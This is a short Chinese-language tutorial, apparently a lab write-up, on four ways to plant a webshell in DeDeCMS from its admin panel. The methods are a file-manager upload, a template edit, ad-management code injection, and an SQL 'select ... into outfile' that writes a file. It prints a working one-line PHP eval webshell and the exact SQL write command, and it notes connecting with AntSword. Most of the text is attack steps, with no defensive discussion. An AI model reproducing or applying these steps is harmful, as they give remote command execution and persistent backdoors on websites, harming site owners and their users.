CMS漏洞-DeDeCMS篇
一.姿势一:通过⽂件管理器上传WebShell
1.首先我们搭建网站然后进行登录
2.模块👉文件管理器👉文件上传
3.新建一个1.php文件,内容为:
<?php phpinfo();?>
选择1.php文件上传
4.访问网站根目录下的1.php,发现代码成功执行,说明我们的木马上传成功!!
二.姿势二:修改模板文件拿WebShell
1.模板👉默认模板管理👉index.htm👉修改
2.插入代码:
<?php phpinfo();?>并保存
3.生成👉更新主机html,主页位置修改为index.php,生成静态,更新主页html
4.访问主页,发现主页为phpinfo界面,说明我们植入的代码有效!
三.姿势三:后台任意命令执⾏拿WebShell
1.模块👉广告管理
在内容上写入代码:
<?php phpinfo();?>
2.上传成功后查看代码,并复制引号内容
3.访问后发现页面无回显
4.现在我们将代码换为一句话木马:
<?php @eval($_POST[cmd]);?>
5.跟上述步骤一样复制引号内容并访问
6.使用蚁剑连接,连接成功!!
说明木马成功植入
四.姿势四:通过后台sql命令执⾏拿webshell
1.系统👉sql命令行工具
在命令行输入select @@basedir;
获取mysql路径,由此猜测⽹站绝对路径
2.在命令行输入:
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/dedecms/uploads/webshell.php'
上传一句话木马到webshell.php文件
3.我们在网站根目录下发现了webshell.php文件,内容为一句话木马
4.我们访问木马文件并复制其绝对路径
5.连接成功!
木马植入成功!